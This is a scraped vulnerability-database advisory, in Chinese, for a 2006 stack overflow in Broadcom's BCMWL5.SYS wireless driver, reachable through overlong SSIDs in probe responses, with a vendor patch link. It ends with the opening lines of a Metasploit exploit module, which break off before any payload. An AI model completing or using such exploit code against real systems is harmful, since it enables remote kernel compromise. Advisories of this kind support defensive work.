Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:506
HistoryNov 14, 2006 - 12:00 a.m.

Broadcom无线驱动探测响应超长SSID栈溢出漏洞

2006-11-1400:00:00
Root
www.seebug.org
33
JSON

Broadcom是全球领先的有线和无线通信半导体公司。

Broadcom的无线驱动程序实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。

Broadcom的BCMWL5.SYS无线驱动在处理包含有超长SSID字段的802.11探测响应报文时存在栈溢出漏洞,允许攻击者通过发送恶意报文导致执行任意内核态代码。

Broadcom BCMWL5.SYS 3.50.21.10
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=“http://www.linksys.com/servlet/Satellite?c=L_Download_C2&amp;childpagename=US%2FLayout&amp;cid=1115417109934&amp;packedargs=sku%3D1144763513196&amp;pagename=Linksys%2FCommon%2FVisitorWrapper” target=“_blank”>http://www.linksys.com/servlet/Satellite?c=L_Download_C2&amp;childpagename=US%2FLayout&amp;cid=1115417109934&amp;packedargs=sku%3D1144763513196&amp;pagename=Linksys%2FCommon%2FVisitorWrapper</a>


                                                require 'msf/core'

module Msf

class Exploits::Windows::Driver::Broadcom_WiFi_SSID &lt; Msf::Exploit::Remote

    include Exploit::Lorcon
    include Exploit::KernelMode    

    def ini
JSON